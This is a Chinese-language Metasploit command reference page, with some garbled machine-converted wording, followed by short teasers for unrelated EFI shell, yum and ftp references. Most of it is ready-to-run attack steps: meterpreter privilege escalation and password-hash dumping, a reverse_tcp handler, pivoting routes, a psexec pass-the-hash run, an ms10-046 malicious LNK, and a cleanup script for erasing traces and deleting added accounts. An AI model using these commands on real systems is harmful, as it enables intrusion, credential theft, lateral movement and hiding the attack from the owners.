Metasploit 命令參考

meterpreter命令

內網拓展

run scriptname

執行 meterpreter 指令碼，在 scripts/meterpreter 目錄下可檢視到所有指令碼

use priv

載入特權提公升擴充套件模組，來擴充套件 meterpreter 庫

getprivs

盡可能多地獲取目標主機上的特權

getsystem

通過各種攻擊向量來提公升到系統使用者許可權

hashdump

匯出目標主機中的口令雜湊值

rev2self

回到控制目標主機的初始使用者賬戶下

setdesktop number

切換到另乙個使用者介面(該功能基於哪些使用者已登入)

screenshot

對目標主機的螢幕進行截圖

background

將當前 meterpreter shell 轉為後台執行

quit

關閉當前meterpreter會話，返回msf終端

兩種使用方法

1、在msf終端通過 use post/****** ，然後設定相關的引數（如 session），然後執行exploit

2、在meterpreter會話中，直接用 run post/******xx執行

對應攻擊機的監聽操作如下：

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.10.141

set lport 443

exploit

注意：指令碼執行會在/root/.msf4/logs/scripts/getgui目錄下生成clean_up__******x.rc指令碼，

當在遠端桌面操作完之後，可以使用這個指令碼清除痕跡，關閉服務、刪除新增的賬號

run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up_******.rc

除外post/windows/gather/credentials目錄下整合了數十個口令攫取的後滲透攻擊模組，

包括vnc、outlook、flashfxp、coreftp、dyndns等

run get_local_subnets

background

route add 192.168.10.0 255.255.255.0 1

route print

意味著對192.168.10.0/24網段的所有攻擊和控制的流量都將通過會話1進行**

msf終端：

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.10.0/25

set ports 445

runmsf終端：

use exploit/windows/smb/p***ec

set payload windows/meterpreter/reverse_tcp

set lhost 10.10.10.128

set lport 443

set rhost 192.168.10.2

set smbpass *********************x:***************x

exploit

ms08-068：當目標機通過smb協議連線到攻擊者的惡意smb伺服器時，攻擊者延時傳送smb響應，提取目標機傳送的重要欄位如ntlm雜湊並對目標機進行重放，達到身份認證的目的後可以執行任意**

ms10-046：lnk快捷方式檔案漏洞

* 生成惡意lnk檔案

msf終端：

use post/windows/escalate/droplnk

set lhost 192.168.10.141 // 檢視session的connection欄位

set session 19 // 對應的session id

exploit

會在目標主機的c:\windows\system32目錄下建立乙個words.lnk檔案，

當存在漏洞的目標機開啟了包含此快捷方式的資料夾，就會以smb方式連線到設定的smb伺服器(192.168.10.141)，以嘗試載入遠端圖示

EFI Shell 命令參考

引導命令 efi shell 與 npartition 引導有關的命令。autoboot 設定 檢視 自動引導超時變數 bcfg 顯示 或修改 驅動程式 或引導配置 boottest 設定 或檢視 boottest 位。dbprofile 顯示 修改要由 lanboot 使用的直接引導配置檔案 la...

Linux Shell YUM命令參考

選項 y 不需要使用者確認就發生操作。yum y install 軟體名稱 安裝指定的軟體 yum y update 公升級所以軟體 yum y update 軟體名稱 更新特定檔案 yum check update 檢查是否有需要更新的軟體 yum info 軟體名稱 顯示指定軟體的資訊 yum ...

unix ftp命令參考

ascii 設定以ascii方式傳送檔案 預設值 bell 每完成一次檔案傳送,報警提示.binary 設定以二進位制方式傳送檔案.bye 終止主機ftp程序,並退出ftp管理方式.case 當為on時,用mget命令拷貝的檔名到本地機器中,全部轉換為小寫字母.cd 同unix的cd命令.cdup ...